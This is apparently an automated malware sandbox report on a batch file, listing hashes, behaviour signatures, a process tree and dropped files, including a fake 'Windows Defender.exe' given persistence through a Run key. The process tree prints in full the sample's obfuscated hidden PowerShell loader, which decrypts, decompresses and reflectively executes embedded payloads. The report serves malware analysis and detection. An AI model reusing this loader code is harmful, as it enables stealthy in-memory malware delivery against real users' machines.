Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/05/2024, 22:53

General

  • Target

    s.bat

  • Size

    864KB

  • MD5

    42c72c26bb7fc92064808e8edb9efdbc

  • SHA1

    8b9cb6f781b99cc723aa2a0d9bcffecd73a5490a

  • SHA256

    722c42c544ec40709b016906077aa4ee555c414a998e3986d9b44e4cfb28b4c2

  • SHA512

    7ac1c09e3242eb3d43d9a1c86e1abd5c1cdc75b5a32881a7287defb0407010533c891eaa0b0d12a496d885ebfc3bc41b57934dfe55a979f0a08a2745d61c167e

  • SSDEEP

    24576:ifUMJg2oIqiT97xw/+JOg0MJcz/aaCbZr:SU/s1T9N0/aawr

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\s.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4140
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLntWa+7DUuCS+fnbQfhf/cxydXpLtg+PQ02HHuVeRk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NtpnTWtFGpfhlwj+FpJ6UQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xlRxg=New-Object System.IO.MemoryStream(,$param_var); $zRntR=New-Object System.IO.MemoryStream; $biJHY=New-Object System.IO.Compression.GZipStream($xlRxg, [IO.Compression.CompressionMode]::Decompress); $biJHY.CopyTo($zRntR); $biJHY.Dispose(); $xlRxg.Dispose(); $zRntR.Dispose(); $zRntR.ToArray();}function execute_function($param_var,$param2_var){ $SZVOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zTOPO=$SZVOd.EntryPoint; $zTOPO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\s.bat';$zVVoV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\s.bat').Split([Environment]::NewLine);foreach ($RfCQM in $zVVoV) { if ($RfCQM.StartsWith(':: ')) { $fcaeB=$RfCQM.Substring(3); break; }}$payloads_var=[string[]]$fcaeB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2528
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe
            "C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3372

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hq0uvzs.5ya.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\install.vbs

    Filesize

    436B

    MD5

    3d8b134867dfacfb69c41d942c4eb0f8

    SHA1

    6e03c2181e8054a6456463f1c9a5578109f400d8

    SHA256

    0d0c60bff9e22ab9e93bfd851df80234948aeb17c504175ad326df3ec9b71144

    SHA512

    f299c44e4cc6d51b9183f8d9ec390b7697aa655ff7be240c69bbabf876137b588e22834aac8f756ef25041b8e4b53efdf4d52668c7d78a509bc4655f3c591f8d

  • C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • memory/2528-18-0x0000000006920000-0x000000000696C000-memory.dmp

    Filesize

    304KB

  • memory/2528-20-0x0000000006EA0000-0x0000000006EBA000-memory.dmp

    Filesize

    104KB

  • memory/2528-6-0x0000000006360000-0x00000000063C6000-memory.dmp

    Filesize

    408KB

  • memory/2528-5-0x00000000062F0000-0x0000000006356000-memory.dmp

    Filesize

    408KB

  • memory/2528-3-0x0000000005B50000-0x0000000006178000-memory.dmp

    Filesize

    6.2MB

  • memory/2528-16-0x00000000063D0000-0x0000000006724000-memory.dmp

    Filesize

    3.3MB

  • memory/2528-17-0x00000000068F0000-0x000000000690E000-memory.dmp

    Filesize

    120KB

  • memory/2528-0-0x00000000752AE000-0x00000000752AF000-memory.dmp

    Filesize

    4KB

  • memory/2528-19-0x0000000008140000-0x00000000087BA000-memory.dmp

    Filesize

    6.5MB

  • memory/2528-4-0x0000000005900000-0x0000000005922000-memory.dmp

    Filesize

    136KB

  • memory/2528-21-0x00000000032E0000-0x00000000032E8000-memory.dmp

    Filesize

    32KB

  • memory/2528-22-0x0000000007B90000-0x0000000007C34000-memory.dmp

    Filesize

    656KB

  • memory/2528-24-0x00000000752A0000-0x0000000075A50000-memory.dmp

    Filesize

    7.7MB

  • memory/2528-32-0x00000000752A0000-0x0000000075A50000-memory.dmp

    Filesize

    7.7MB

  • memory/2528-2-0x00000000752A0000-0x0000000075A50000-memory.dmp

    Filesize

    7.7MB

  • memory/2528-1-0x0000000005420000-0x0000000005456000-memory.dmp

    Filesize

    216KB

  • memory/3372-45-0x0000000006150000-0x00000000064A4000-memory.dmp

    Filesize

    3.3MB

  • memory/3372-46-0x0000000006C80000-0x0000000006CCC000-memory.dmp

    Filesize

    304KB

  • memory/3372-47-0x0000000006C00000-0x0000000006C44000-memory.dmp

    Filesize

    272KB

  • memory/3372-48-0x0000000007A20000-0x0000000007A96000-memory.dmp

    Filesize

    472KB